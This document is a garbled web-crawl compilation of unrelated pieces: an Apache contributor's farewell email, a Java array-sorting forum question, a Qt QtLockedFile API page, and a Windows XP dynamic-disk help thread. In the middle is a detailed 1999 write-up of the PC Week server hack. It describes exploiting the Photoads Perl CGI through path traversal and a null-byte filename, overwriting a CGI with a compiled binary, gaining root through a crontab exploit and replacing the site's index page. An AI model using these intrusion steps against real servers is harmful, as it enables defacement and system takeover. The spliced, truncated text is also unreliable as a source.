Final words: I've spent 5 years of my life around Apache. It's about 20%
of my entire life. I didn't enjoy every minute of it, but I did enjoy
every new thing I learned and every person I met.
Software is the excuse for being here, but the real thing is learning
and having the chance to meet wonderful people that I could not find
down the road.
I owe everything I am to the friends that helped me during my Apache
journey: Federico Barbieri, Pierpaolo Fumagalli, Fabrizio Rovelli, Jon
Stevens, Brian Behlendorf, James Davidson, Donald Ball, Ricardo Rocha,
Giacomo Pati, Roy Fielding, Sam Ruby, and thousands of others.
Apache is recognized as the place where good software get written, but
it's much more: it's a place where a person gets helped to fix his/her
own problems by using software writing as an excuse.
I'm a better person than I used to be: this is all that matters and this
is what my "@apache.org" mail address means to me.
This is what the "Apache spirit" is. Don't let anything, not even
software, interfere with this.
Take care :)
-- | http://mail-archives.apache.org/mod_mbox/cocoon-dev/200111.mbox/%[email protected]%3E | CC-MAIN-2016-44 | refinedweb | 2,099 | 68.6 |
Hello all! My first post here
I've started teaching myself java and at the moment am making a really simple number sorter to sort an array in ascending order. As far as I'm aware I have the number sorting bit down and amusingly the thing I'm stuck on is getting the new sorted array to print. I'm trying to do it via loops rather than the prebuilt java classes as I really want to get a proper grasp of loops before i move on. Anyways I'm getting 15 compile errors at the mo (won't post them here as they are really long) and they are all for my print loop. If anyone could have a look at my code and tell me whats up it would be much appreciated!
Thanks
Native
import java.io.*; class SortAsc { public static void main ( String agrs[] ) { int A[]={8,9,3,10}; int i,k; for(i=0;i<4;i++) { for(k=0;k<4;k++) { if (A[k]<A[i]) { int temp; temp = A[k]; A[k] = A[i]; A[i] = temp; } } } } int l; for(l=0;l<4;l++) { System.out.print(A[l]); } } | http://www.javaprogrammingforums.com/whats-wrong-my-code/9896-printing-array.html | CC-MAIN-2015-48 | refinedweb | 199 | 73.51 |
How do I install python. I just want to activate the one already installed(I haven’t installed anything, the Wiki said Dreamhost already has it installed) Thanks
Python is installed at /usr/bin/python. What do you want to do with it?
emufarmers.com
Very little to do with either emus or farmers!
Im just trying to get a Python script to work…
I think Emufarmers was trying to tell you that python should already be on your path and ready to go. There should be no need to install another copy.
typing “python” at the login prompt I’m greeted with "Python 2.3.5
Any chance you could show us the first couple of lines of your script? This would allow us to help you a lot more.
(Theory, your “shebang” #! does not point to the installed version of python)
Wholly - Use promo code WhollyMindless for full 97$ credit. Let me know if you want something else!
"
#!/usr/bin/python
def main():
print "Content-type: text/html"
print
print ""
print "Hello World from Python"
print ""
print "Standard Hello World from a Python CGI Script"
print “”
if name == “main”:
main()
"
Without the "s of course. It should be already installed so what am I doing wrong lol(thats from the dreamhost wiki) | https://discussion.dreamhost.com/t/python-install-help/42121 | CC-MAIN-2018-09 | refinedweb | 214 | 82.24 |
The QtLockedFile class extends QFile with advisory locking functions. More...
#include <QtLockedFile>
Inherits QFile.
The QtLockedFile class extends QFile with advisory locking functions.
A file may be locked in read or write mode. Multiple instances of QtLockedFile, created in multiple processes running on the same machine, may have a file locked in read mode. Exactly one instance may have it locked in write mode. A read and a write lock cannot exist simultaneously on the same file.
The file locks are advisory. This means that nothing prevents another process from manipulating a locked file using QFile or file system functions offered by the OS. Serialization is only guaranteed if all processes that access the file use QLockedFile. Also, while holding a lock on a file, a process must not open the same file again (through any API), or locks can be unexpectedly lost.
The lock provided by an instance of QtLockedFile is released whenever the program terminates. This is true even when the program crashes and no destructors are called.
This enum describes the available lock modes.
Constructs an unlocked QtLockedFile object. This constructor behaves in the same way as QFile::QFile().
See also QFile::QFile().
Constructs an unlocked QtLockedFile object with file name. This constructor behaves in the same way as QFile::QFile(const QString&).
See also QFile::QFile().
Destroys the QtLockedFile object. If any locks were held, they are released.
Returns true if this object has a in read or write lock; otherwise returns false.
See also lockMode().
Obtains a lock of type mode. The file must be opened before it can be locked.
If block is true, this function will block until the lock is aquired. If block is false, this function returns false immediately if the lock cannot be aquired.
If this object already has a lock of type mode, this function returns true immediately. If this object has a lock of a different type than mode, the lock is first released and then a new lock is obtained.
This function returns true if, after it executes, the file is locked by this object, and false otherwise.
See also unlock(), isLocked(), and lockMode().
Returns the type of lock currently held by this object, or QtLockedFile::NoLock.
See also isLocked().
Opens the file in OpenMode mode.
This is identical to QFile::open(), with the one exception that the Truncate mode flag is disallowed. Truncation would conflict with the advisory file locking, since the file would be modified before the write lock is obtained. If truncation is required, use resize(0) after obtaining the write lock.
Returns true if successful; otherwise false.
See also QFile::open() and QFile::resize().
Releases a lock.
If the object has no lock, this function returns immediately.
This function returns true if, after it executes, the file is not locked by this object, and false otherwise.
See also lock(), isLocked(), and lockMode(). | http://doc.qt.nokia.com/solutions/4/qtlockedfile/qtlockedfile.html | crawl-003 | refinedweb | 479 | 69.07 |
An analysis of the PC Week Crack of an Apache Web Server running on Red Hat. An extremely interesting article to read, describing in detail how a cgi on the box was exploited. An application of the excellent article by rain forest puppy on manipulating perl in Phrack 55 (a must read).
a65f213ea935f93e75f4326a86a6fc2c
SOURCE: <>
A practical vulnerability analysis
(The PcWeek crack)
By Jfs
First.
lemming:~# telnet securelinux.hackpcweek.com 80
Trying 208.184.64.170...
Connected to securelinux.hackpcweek.com.
Escape character is '^]'.
POST X HTTP/1.0
HTTP/1.1 400 Bad Request
Date: Fri, 24 Sep 1999 23:42:15 GMT
Server: Apache/1.3.6 (Unix) (Red Hat/Linux)
(...)
Connection closed by foreign host.
lemming:~#...)
After no results, I tried to find out what the website structure was, gathering information from the HTML pages, I found out that the server had this directories under the DocumentRoot of the website:
/
/cgi-bin
/photoads/
/photoads/cgi-bin
So I got interested in the photoads thingie, which seemed like an installable package to me. After some searching on the WWW I found out that photoads was a commercial CGI package from "The Home Office Online"
(). It sells for $149, and they grant you access to the source code (Perl), so that you can check and modify it.
I asked a friend if he would let me gave a look at his photoad installation
and this is how I got access to a copy of what could be running in the securelinux machine.
I checked the default installation files and I was able to retrieve the ads database (stored in the) with all the user passwords for their ads. I also tried to access the configuration file /photoads/cgi-bin/photo_cfg.pl but because of the server setup I couldn't get it.
I got the /photoads/cgi-bin/env.cgi script (similar to test-cgi) to give me details of the server such as the location in the filesystem of the
DocumentRoot (/home/httpd/html) apart from other interesting data (user the
server runs as, in this case nobody).
So, first things first, I was trying to exploit either SSI (Server side includes) or the mod_perl HTML-embedded commands, which look something like:
<!--#include file="..."--> for SSI
<!--#perl ...--> for mod_perl
The scripts filtered thsi input on most of the fields, through a perl regexp that didn't leave you with much room to exploit. But I also found a user assigned variable that wasn't checked for strange values before making it into the HTML code, which will let me embed the commands inside the HTML for server side parsing:
In post.cgi, line 36:
print "you are trying to post an AD from another URL:<b> $ENV{'HTTP_REFERER'}\n";
The $ENV{'HTTP_REFERER'} is a user provided variable (though you have to know a bit of how HTTP headers work in order to get it right), which will allow us to embed any HTML into the code, regardless of what the data looks like.
Refer to the files getit.ssi and getit.mod_perl for the actual exploit.
To exploit it, do something like:
lemming:~# cat getit.ssi | nc securelinux.hackpcweek.com 80
But unfortunately, the host didn't have SSI nor mod_perl configured, so I
hit a dead end.
I decided to find a hole in the CGI scripts. Most of the holes in perl scripts are found in open(), system() or `` calls. The first allows reading, writing and executing, while the last two allow execution.
There were no occurrences of the last two, but there were a few of the open() call:
lemming:~/photoads/cgi-bin# grep 'open.*(.*)' *cgi | more
advisory.cgi: open (DATA, "$BaseDir/$DataFile");
edit.cgi: open (DATA, ">$BaseDir/$DataFile");
edit.cgi: open(MAIL, "|$mailprog -t") || die "Can't open $mailprog!\n";
photo.cgi: open(ULFD,">$write_file") || die show_upload_failed("$write_file $!");
photo.cgi: open ( FILE, $filename );
(...)
There was nothing to do with the ones referring to $BaseDir and $DataFile as these were defined in the config file and couldn't be changed in runtime.
Same for the $mailprog.
But the other two lines are juicier...
In photo.,cgi, line 132:
$write_file = $Upload_Dir.$filename;
open(ULFD,">$write_file") || die show_upload_failed("$write_file $!");
print ULFD $UPLOAD{'FILE_CONTENT'};
close(ULFD);
So if we are able to modify the $write_file variable we will be able write to any file in the filesystem. The $write_file variable comes from:
$write_file = $Upload_Dir.$filename;
$Upload_Dir is defined in the config file, so we can't change it, but what about $filename?
In photo.cgim line 226:
if( !$UPLOAD{'FILE_NAME'} ) { show_file_not_found(); }
$filename = lc($UPLOAD{'FILE_NAME'});
$filename =~ s/.+\\([^\\]+)$|.+\/([^\/]+)$/\1/;
if ($filename =~ m/gif/) {
$type = '.gif';
}elsif ($filename =~ m/jpg/) {
$type = '.jpg';
}else{
{&Not_Valid_Image}
}
So the variable comes from $UPLOAD{'FILE_NAME'} (extracted from the variables sent to the CGI by the form). We see a regexp that $filename must match in order to help us get where we want to get, so we can't just sent any file we want to, e.g. "../../../../../../../../etc/passwd", cos it will get nulled out by the substitution :
$filename =~ s/.+\\([^\\]+)$|.+\/([^\/]+)$/\1/;
We see, if the $filename matches the regexp, it's turned to ascii 1 (SOH).
Apart from this, $filename must contain "gif" or "jpg" in its name in order
to pass the Not_Valid_Image filter.
So, after playing a bit with various approaches and with a bit of help from
Phrack's last article on Perl CGI security we find that
/jfs/\../../../../../../../export/www/htdocs/index.html%00.gif
should allow us to refer to the index.html file (the one we have to modify, the main page in the web server).
But then, in order to upload we still need to fool some more script code...
We notice that we won't be able to fool the filename if we send the form in
a POST (the %00 doesn't get translated), so we are left out with only a GET.
In photo.cgi, line 256, we can see that some checks are done in the actual content of the file we just uploaded (:O) and that if the file doesn't comply with some specifications (basically width/length/size) of the image (remember, the photo.cgi script was supposed to be used as a method to upload a photoad to be bound to your AD). If we don't comply with these details the script will delete the file we just uploaded (or overwritten), and that's not what we want (at least not if we want to leave our details somewhere in the server :).
PCWeek has the ImageSize in the configuration file set to 0, so we can forget about the JPG part of the function. Let's concentrate on the GIF branch:
if ( substr ( $filename, -4, 4 ) eq ".gif" ) {
open ( FILE, $filename );
my $head;
my $gHeadFmt = "A6vvb8CC";
my $pictDescFmt = "vvvvb8";
read FILE, $head, 13;
(my $GIF8xa, $width, $height, my $resFlags, my $bgColor, my $w2h) = unpack $gHeadFmt, $head;
close FILE;
$PhotoWidth = $width;
$PhotoHeight = $height;
$PhotoSize = $size;
return;
}
and in photo.cgi, line 140:
if (($PhotoWidth eq "") || ($PhotoWidth > '700')) {
{&Not_Valid_Image}
}
if ($PhotoWidth > $ImgWidth || $PhotoHeight > $ImgHeight) {
{&Height_Width}
}
So we have to make the $PhotoWidth less than 700, different from "" and smaller than ImgWidth (350 by default).
So we are left with $PhotoWidth != "" && $PhotoWidth < 350 .
For $PhotoHeight it has to be smaller than $ImgHeight (250 by default).
So, $PhotoWidth == $PhotoHeight == 0 will do for us. Looking at the script that gets the values into those variables, the only thing we have to do is to set the values in the 6th to 9th byte to ascii 0 (NUL).
We make sure that we put our FILE_CONTENT to comply with that and proceed with the next problem in the code...
chmod 0755, $Upload_Dir.$filename;
$newname = $AdNum;
rename("$write_file", "$Upload_Dir/$newname");
Show_Upload_Success($write_file);
Argh!!! After all this hassle and the file gets renamed/moved to somewhere we don't want it to be :(
Checking the $AdNum variable that gives the final location its name we see that it can only contain digits:
$UPLOAD{'AdNum'} =~ tr/0-9//cd;
$UPLOAD{'Password'} =~ tr/a-zA-Z0-9!+&#%$@*//cd;
$AdNum = $UPLOAD{'AdNum'};
Anything else gets removed, so we can't play with the ../../../ trick in here anymore :|
So, what can we do? The rename() function expects us to give him two paths, the old one and the new one... wait, there is no error checking on the function, so if it fails it'll just keep on processing the next line. How can we make it fail? using a bad file name. Linux kernel has got a restriction on how long a file can be, defaults to 1024 (MAX_PATH_LEN), so if we can make the script rename our file to something longer than 1024 bytes, we'll have it! :)
So, next step we pass it a _really large_ AD number, approximately 1024 bytes long.
Now, the script won't allow us to process the script as it only allows us to post photos for ADs number that do exist... and it will take us a hell of a lot of time to create taht many messages in the board 10^1024 seems quite a long time to me :)
So... another dead end?
Nah, the faulty input checking functions let us create an add with the number we prefer. Just browse through the edit.cgi script and think what will happen if you enter a name that has a carriage return in between, then
a 1024 digits number? :) We got it...
Check the long.adnum file for an exploit that gets us the new ad created.
So, after we can fool the AdNum check, the script makes what we do, that is:
Create/overwrite any file with nobody's permissions, and with the contents
that we want (except for the GIF header NULs).
So, let's try it
Check the overwrite.as.nobody script that allows us to do that.
So far so good. So, we adjust the script to overwrite the index.html web page... and it doesn't work. Duh :(
It's probably that we didn't have the permission to overwrite that file (it's owned by root or it's not the right mode to overwrite it). So, what do we do now? Let's try a different approach...
We try to overwrite a CGI and see it we can make it run for us :) This way we can search for the "top secret" file and we'll get the prize anyway :)
We modify the overwrite script, and yes, it allows us to overwrite a CGI! :)
We make sure we don't overwrite any important (exploit-wise) CGI and we choose the advisory.cgi (what does it do anyway? :)).
So, we will upload a shell script that will allow us to execute commands, cool...
But then, when you run a shell script as a CGI, you need to specify the
shell in the first line of the script, as in:
#!/bin/sh
echo "Content-type: text/html"
find / "*secret*" -print
And remember, our 6th, 7th, 8th and 9th bytes had to be 0 or a very small value in order to comply with the size specifications...
#!/bi\00\00\00\00n/sh
That doesn't work, the kernel only reads the first 5 bytes, then tries to execute "#!/bi"... and as far as I know there is no shell we can access that fits in 3 bytes (+2 for the #!). Another dead end...
Looking at an ELF (linux default executable type) binary gives us the answer, as it results that those bytes are set to 0x00, yohoo :)
So we need to get an ELF executable into the file in the remote server. We have to url-encode it as we can only use GETs, not POSTs, and thus we are limited to a maximum URI length. The default maximum URI length for Apache is 8190 bytes. Remember that we had a _very long_ ad number of 1024 characters, so we are left with about 7000 bytes for our URL-encoded ELF program.
So, this little program:
lemming:~/pcweek/hack/POST# cat fin.c
#include <stdio.h>
main()
{
printf("Content-type: text/html\n\n\r");
fflush(stdout);
execlp("/usr/bin/find","find","/",0);
}
compiled gives us:
lemming:~/pcweek/hack/POST# ls -l fin
-rwxr-xr-x 1 root root 4280 Sep 25 04:18 fin*
And stripping the symbols:
lemming:~/pcweek/hack/POST# strip fin
lemming:~/pcweek/hack/POST# ls -l fin
-rwxr-xr-x 1 root root 2812 Sep 25 04:18 fin*
lemming:~/pcweek/hack/POST#
Then URL-encoding it:
lemming:~/pcweek/hack/POST# ./to_url < fin > fin.url
lemming:~/pcweek/hack/POST# ls -l fin.url
-rw-r--r-- 1 root root 7602 Sep 25 04:20 fin.url
Which is TOO large for us to use in our script :(
so, we edit the binary by hand using our intuition and decide to delete everything after the "GCC" string in the executable. It's not a very academic approach and probably it'll pay to check the ELF specifications, but hey, it seems to work:
lemming:~/pcweek/hack/POST# joe fin
lemming:~/pcweek/hack/POST# ls -l fin
-rwxr-xr-x 1 root root 1693 Sep 25 04:22 fin*
lemming:~/pcweek/hack/POST# ./to_url < fin > fin.url
lemming:~/pcweek/hack/POST# ls -l fin.url
-rw-r--r-- 1 root root 4535 Sep 25 04:22 fin.url
lemming:~/pcweek/hack/POST#
Now, we incorporate this into our exploit, and run it...
Check the file called get.sec.find in the files directory for more info.
Also there you will find the to_url script and some .c files with basic commands to run along with their URL translations and finished exploits.
So, we upload the CGI, and access it with our favorite browser, in this case:
wget
Which gives us a completed find / of the server :)
Unfortunately, either the "top secret" file is not there, or it is not accessible by the nobody user :(
We try some more combinations as locate, ls and others, but no traces of the "top secret" file.
[ I wonder where it was after all, if it ever existed ]
So, time to get serious and get root. As a friend of mine says, why try to reinvent the wheel, if it's already there. So with our data about the server
(Linux, i386 since my computer is an i386 and the ELFs ran as a charm...) we grep the local exploit database and find a nice exploit for all versions of RH's crontab.
Available on your nearest bugtraq/securityfocus store :) kudos to w00w00 for this
We modify it to tailor our needs, as we won't need an interactive rootshell, but to create a suidroot shell in some place accessible by the user nobody.
We tailor it to point to /tmp/.bs. We upload the CGI again, run it with our browser, and we are ready to see if the exploit runs fine.
We make a CGI that will ls /tmp and yeah, first try and we have the suitroot waiting for us :)
We upload a file to /tmp/xx with the modified index.html page.
Time to make a program that will run:
execlp("/tmp/.bs","ls","-c","cp /tmp/xx /home/httpd/html/index.html",0);
And at this point the game is over :)
It's been around 20hours since we started, good timing 8)
We then upload and copy our details to a secure place where nobody will see them, and post a message in the forum waiting for replies :)
( Download PCWEEK.ZIP to get the xploits and scripts used. )
Jfs - !H'99
[email protected] | http://packetstormsecurity.org/files/16083/jfs_pcweek.txt.html | crawl-003 | refinedweb | 2,611 | 72.16 |
- html template and update function problem ?
- ref Config option Equivalent
- Last list item overlapped with tabpanel's bottom bar
- Form Scrolling Problem
- Date objects not displaying on Android
- Need Help for other for getting started work on snecha Touch
- Show and Hide Docked Items.
- Toolbar does not slides with the content (blue layer appears over it)
- Problems with Panel
- datepickerfield without year slot?!?
- The problem about icons that link me to other panel
- Event delegation, same event different delegates
- Android - supported devices
- Public Events on API Docs
- showing loader while loading store
- placing html content help
- How can I use a chart code in demo app?
- How to load external web page in Tab
- SenchaTouch Themes - how to change color of placeHolder in textfield?
- Client Cached or Buffered AjaxProxy
- updating select width on label content changed
- XTemplate and Custom Component (radiogroup)
- Data not display in list
- Best way to pass data from a list to a panel
- MVC + Login
- Touch Framework, gyroscope and gps....
- Infinite Carousel with Sencha Touch 1.0
- Vertical ProgressBar in Extjs
- Sencha Touch on Blackberry Playbook?
- Designing a layout
- data not display in list from server
- HiddenField not posting value?
- Change Background Color of FormPanel
- Strange problem....please help
- How to get Model's Field value
- Ext.Panel - resize and bodyresize events never fire
- Ext.Panel - resize and bodyresize events never fire
- A little help loading a simple form
- ScriptTag and server-defined callback key.. help!
- Sencha Touch and url scheme ???
- Ux.util.Format.addCommas
- Element getBottom() returns 0
- Job Opening
- Adding multiple registered types to panel stacks one on top of each other
- Multi page site
- Multitouch Zoom
- Accessing Json data above root
- Adding/removing sublist elements
- SSL Form?
- Adding a record at the leaf node of nestedlist
- Ext.list item height for menu navigation
- list detail page?
- How to disable file upload field and file upload icon
- Scrolling after panel.update not working
- Load Model after Standar From Submit.
- Use of getNodeById() with jsontree
- Associations and XTemplates
- Grouped Nested List?
- Packaging Sencha app for iPhone
- Read multiple lists with Json
- Looking for the right property / Up. - Down Slider
- Carousel example inside a Tabpanel.
- load new panel on carousel click
- phonegap orientation example and question
- icon images not appearing when connected via 3G
- Add Items to Panel
- Running Sencha Touch - Getting Blank Page
- Load Multiple Models using Store.
- Form/Post list data
- Load RSS/Atom Data Using Google API
- Tapping a Ext.Button while in Airplane mode blackens screen
- How to style components: themes, ui, where I can find examples/tutorials/guide?
- server side json data is not getting loaded into TouchGridPanel
- Will sencha touch include the ExtJS4 charts ?
- Why does the LoadMask inject HTML? Why not let Element.mask do that?
- Is there a autocomplete with comboxbox control?
- Model Association does not work in case of xml
- All Picto icons available on Toolbar?
- Developing with Sencha Touch and Phone Gap using Windows
- updating only new members of has_many assocation
- Update NestedList
- Stores & mapping fields that can be null
- Terminal TouchScreen Applications
- Can anyone help with disabling or removing the automatic Orientation Change?
- Events in gridpanel
- How to run sencha touch codes in phonegap framework using ECLIPSE IDE?
- Alignment of buttons in tabbar
- Can I have a "popup" panel opened on clicking a button?
- DataView requires tpl, store and itemSelector configurations to be defined.
- Style an Ext.Template depending on value
- Swiping too fast on Carousel
- Change list index letters to whole value
- XTemplate access global variable or js function from within 'if='?
- Manually Set Selected Item look inTabBar?
- Obtaining a reference to a field
- Save and Get custom data from store
- Adding loadMask to a gridpanel...
- Tooltip
- Awesome MVC Tutorial (+ PhoneGap Integration) by James Pearce
- draggable and droppable list items?
- iPhone album view
- Foursquare API and Sencha Touch
- Capture customer's signature with Sencha Touch (and Phonegap)?
- panel as a leaf in nestedlist
- Ajax Question.
- Can't see data
- WebStorageProxy issue
- Ext.Toolbar items not showing up
- Displaying html formatted code by creating link from the sink navigation structure
- Can you put a list inside a carousel?
- CRUD
- NestedList cancel itemtap event not working...
- Tabs not removed from TabBar when associated card destroyed
- Theming Issue
- Stop Orientation Change
- Database record List View (sencha touch+phonegap)
- card layout in landscape + phonegap problem
- AjaxProxy on failure
- carousel2 modifications ?
- CardLayout combined with List/OnItemDisclosure
- syntax for combining 2 ui styles for buttons
- Can you active a tab by clicking on an item in a carousel?
- namespace
- How to disable buttons in an Ext.TabPanel?
- Animating (fadeout) background color - highlight() method
- List rendering race condition
- Event for TextField's clear?
- Model.load not sending id, loading all models
- Using sencha touch with appcelerator?
- Can anyone help with setActiveItem method?
- navigation via button
- Select not working on Android and iPhone
- CardLayout combined with List/OnItemDisclosure
- get the device screen width and heigth?
- Store paging functions
- Charting with Sencha Touch?
- how hide loadmask when list is loaded....
- list 'hiccup' on mouseup event
- Handset/Phone recommendation
- Flexible TabPanels
- Even Odd list View
- Waiting for Store in Sencha Touch
- Sencha contact form
- Newbie question: display local json data in a panel
- Conditional fields validations
- [Newbie Question] Displaying JSON data after form submission
- Problem to add Ext.List into Ext.TabPanel.
- XTemplate syntax
- Credit Card Reader?
- Carousel with Embedded YouTube Video Problem
- Mapping XML elements that are prefixed
- refused to set unsafe header authorization
- Creating buttons on Sheet from JSON source
- App Needed
- Adding Class over the list
- Right to Left problem <html dir="rtl">
- Store Filter Date Range
- Pushing the SASS theming envelope
- Capturing tab change in TabPanel
- console.log is not printing anything
- Form element performance on Android and iPhone
- NestedList: dinamic change store
- Can you dymanically edit the dockedItems?
- Custom Layout Examples
- Touch API Viewer search returns ExtJS classes?
- .NET MVC 2 Issue
- Read 2 XMLs using Sencha
- how to print debug message?
- Double Prompt?
- sencha commandline tool not working?
- NestedList Root -> DetailCard
- Remove Toolbar from NestedList
- Create hidden search field on to of a list
- Textarea that automatically expand
- complex models
- touchstyle.mobi not working on samsung galaxy tab
- Bug? mask on tapping a bottom tabbar tab label
- How to disable Retina pixel doubling on mobile i-device (force 1-to-1 pixel ratio)?
- onItemDisclosure in NestedList
- SASS & Sencha Touch: how do I apply a gradient to a pressed list item?
- Newbie Question on Sencha touch framework
- Event bubbling from Panel to Container
- form.Select on Android 2.2 not working.
- Ext.data.Store Not Populated with scripttag proxy result
- Nestedlist from external JSON location
- Transition question, please just talk me through it
- Dynamically Changing attribute values
- Calendar Picker/Chooser
- NestedList get the parent id of a leafitem
- Compatibility with Android??? Bad experience...
- Validations
- Extend TabPanel to introduce new properties
- Load record into form via REST
- Save and Load a Store with different URLs?
- Change Button Color with Javascript
- Panel does not resize after hiding toolbar docked at the bottom
- Re-rendering ".add"ed components
- Items inside TabPanel card/tab not rendered in Android emulator
- What's the best way to do Alternating Line styles in a Ext.List?
- Following Tommys MVC vid, no application property on the controller
- Is an <iframe> that scrolls possible in a Carousel?
- getGroupString property with HTML?
- List not scrolling
- Problems with the getting startet project
- Problem with scroll to top in Ext.panel with input type="text". Is it a bug?
- Problem with scrollToTop with input form on iPad with keyboard on screen. Is it bug?
- DataView's bindStore()
- Best practice to implement this Design.
- Problems with JSONP
- Best way to dynamically create panels with data from store?
- record passed in getDetailCard - where am I going wrong?
- Better alternatives to "compass watch"
- DatePickerField with date from store ?
- Going Back on Nestedlist, refresh needed?
- detailedCard doesn't disappear when Back button is pressed
- Trouble implementing with Ext.Application
- Slide until certain part of the screen
- Custom SASS build file breaks back button UI
- DataView.bindStore doesn't work correctly
- MVC-Tutorial with PhoneGap
- PhoneGap Tutorial and iPad
- how to use the setActiveItem method of Cardlayout??????
- Connection strength assessment
- Display Bottom bar on screen tap
- Device compatabilty info
- Lost in Ext.extend ... where am I ...?
- Lost in Ext.extend ... where am I ...?
- seems like "Preview Post" does not work
- Image loading spinner
- Sencha Touch and PhoneGap problem with builds - Xcode not referencing changes
- Trouble with Twitter app
- Wiring up views in tabs
- Items inside carousel don't scroll
- Broken link in Sencha tutorial
- Sencha MVC Tutorial has broken link to source code zip file
- Drag and Drop multiple targets
- What should I do to use Persistance.js with Sencha Touch models
- Dataview and multiselect not working?
- Not sure why my subclassed control is only showing up once.
- Event Delegates for Multiple Elements in a List Row
- Toolbar trickery
- Ext.List Object Inside of Ext.Panel Won't Render Unless Orientation Changes
- Please. Basic question, how to show a fullscreen panel from a list click?
- How to play youtube video using Ext.Video component?? | http://www.sencha.com/forum/archive/index.php/f-55-p-15.html?s=68ce2f7d863026d5e357c6017aa76c8a | CC-MAIN-2014-35 | refinedweb | 1,508 | 56.86 |
I am trying to add seller_id to my items model in a migration by doing the following:
rails g model Item title:string description:text price:bigint status:integer published_date:datetime seller:belongs_to
class CreateItems < ActiveRecord::Migration
def change
create_table :items do |t|
t.string :title
t.text :description
t.bigint :price
t.integer :status
t.datetime :published_date
t.belongs_to :user, index: true, foreign_key: true
t.timestamps null: false
end
end
end
Just explicitly define what you want in the migration file and add the necessary relation to your model, instead of t.belongs_to you could just use:
t.integer :seller_id, index: true, foreign_key: true
and in your models you could go about this a few ways, if you also want reference your relation as seller on item instances then in the Item class make the relation:
belongs_to :seller, class_name: 'User'
and in the User class:
has_many :items, foreign_key: :seller_id
or if you want to reference it as user from the items then:
belongs_to :user, foreign_key: :seller_id
In terms of editing the generator, that is the default way that a model generator works and in my opinion I like to keep the defaults the way they are. However I do recommend creating your own rails generators or your own rake tasks for when you want to create some custom / special case stuff. For looking at creating your own generator I would point you to the ruby on rails official guide for creating generators to get you started: | https://codedump.io/share/va39lz1s8XoS/1/rails-migration-tbelongsto-user-add-custom-column-name-sellerid | CC-MAIN-2017-30 | refinedweb | 247 | 51.89 |
This is a patch for the bug "Incorrect parsing of strings with null characters (\u0000) - ID: 3525583".
It basically includes the length of a string in Json::Value as part of the union, and in value and writer either the the pair (char*, length) or the c++ string are used.
It also modifies the writer to write \0 as \u0000.
The end result is that you can parse strings like "NUL: \u0000 end" which will return:
* Json::Value::asString() returns "NUL: \0 end" (stringn actually containing a \0 character
* Is written (writer.write or toStyledString) escaping the \u0000 character.
We're using this for JSONs containing blobs of binary data and it seems to work fine.
Please let me know where it'd best to add some tests for it - I'd more than happy to take a closer look at that.
The patch is done against 0.6.0-rc2 (r191).
Let me know what you think - Hopefully you can include this in the code :)
Stefan Wehner
2013-04-05
Mike Gelfand
2014-01-25
Great patch, Stefan. One issue though, you have lost reverse solidus escaping, so additional condition should be added to
isCharacterToEscape to make it look like
static bool isCharacterToEscape(char ch)
{
return ( ch >= 0 && ch <= 0x1F ) || ( ch == '\"' ) || ( ch == '\' );
}
There also were some changes (using r275 now) which prevent clean patch application, but nothing one couldn't deal with.
Mike Gelfand
2014-02-04
The patch I'm currently using could be found at (against r276).
Christopher Dunn
2015-03-06
As of versions
1.5.0 and
0.9.0, UTF-8 with nulls is now supported at:
Please let us know if you see a problem. We were not able to accept the patch because we had to maintain binary-compatibility. Nice work though.
Christopher Dunn
2015-03-06 | http://sourceforge.net/p/jsoncpp/patches/18/ | CC-MAIN-2015-27 | refinedweb | 305 | 71.95 |
DZone Weekly Link Roundup (April 30)
DZone Weekly Link Roundup (April 30)
Join the DZone community and get the full member experience.Join For Free
The State of API Integration 2018: Get Cloud Elements’ report for the most comprehensive breakdown of the API integration industry’s past, present, and future.
NEWS
NoSQL Meets Bitcoin and Brings Down Two Exchanges: The Story of Flexcoin and Poloniex/
Flex.
A Performance Comparison Between Java and C on the Nexus 5.
Introducing the OpenStack SDK for PHP
This is a proposed OpenStack project that is designed to improve the experience of OpenStack end-users who are using the PHP programming language by providing them with everything they need to develop applications against OpenStack. The primary target for this package is application developers who develop against OpenStack. This does not include those who develop OpenStack itself or operate it. These are developers looking to consume a feature-rich OpenStack Cloud with its many services. These Developers require a consistent, single namespace API ("Application Programming Interface") that allows them to build and deploy their application with minimal dependencies.
GENERAL
On Languages, VMs, Optimization, and the Way of the.
Design a Better SQL Database With Database Normalization.?
HUMOR
Sh*t Programmers Say
Here's a hint at the joke: programmers don't say anything! How dare they sit there in all their smug productivity.
How to Make a Good Code Review
NERDY
The Physics of Spider-Man's Webs
Perhaps the most distinguishing feature of Spider-Man is his ability to shoot webs. Now, let’s be clear. Spider-Man’s webs are a technology based super-power. Forget what you saw in previous Spider-Man movies. His webs don’t just come out of special holes in his wrists. Those movies were wrong. No, Peter Parker developed these devices using his brain (or maybe he stole them).
How to Pair Socks From A Pile Efficiently into mind to achieve an O(NlogN) }} | https://dzone.com/articles/dzone-weekly-link-roundup-18 | CC-MAIN-2018-34 | refinedweb | 326 | 56.55 |
downloading and burning the latest copy of Knoppix live CD. Boot via the CD and see if you can see the data on the drive. In fact, it doesn't have to be Knoppix any more. You might prefer something like PCLinuxOS, which is very user friendly and will set up a network connection as part of the live CD installation.
If you can, choose a method for transfer; pen stick, via the network or whatever.
Good luck.
if only the mb went down, why replace all those components. Sounds more like a short running across the system. Try putting the drive in all by itself to see if the system recognizes it. You do not have to boot to it for the bios torecognize it. If it can recognize it, you may need to formatt the drive. If it can't, you may need to rearrange the jumper/s on it or low level formatt it. If it is only the drive you are concerned abot and not the data, chuck it
righ click my computer
click on manage
click on disk management
you should see the drive shown
right click in the gray area at left
import forein disk
is it showing you a drive letter?
sorry I forgot some things to mention.
right clicking in white area gives you different option as apposed to right clicking in the gray area to the left of the disk. you may have already known this but just wanted you to know all the options.
I have a problem I think is assoiated with dynamic drives in Bootable Raid 0
I don't think Norton Internet Security likes it too much.
I keep getting an error (0xc0000142)
oscheck.exe aqccapp.exe
symcuw.exe ect.....
Also I would like any input of Going Bootable Raid 0 and keeping the Disks Basic and not changing to Dynamic. I understand the fact that you would not be able to extend the volumn into another disk but it seems to work ok that way if I am seeing it right.
Dynamic drive in XP
I installed a secondary hard drive in to XP SP2 as a dynamic drive. Later, the motherboard went down and I ended up replacing the mb, cpu, ram, graphics and primary hard drive. After all was working again I plugged in the dynamic drive only for windows to tell me that it wasn?t formatted. The drive was working fine up to the old mb going down. Primary drive is NTFS. How can I get the drive going again?
Setting the drive as a 32Mb limited drive, xp says :
Partition, basic, healthy, active, 31.50Gb, 100% free, online, not accessible, the volume does not contain a recognised file system.
Whilst just setting it as an unlimited slave, xp says:
As above but unformatted, there is an option to convert to dynamic disk.
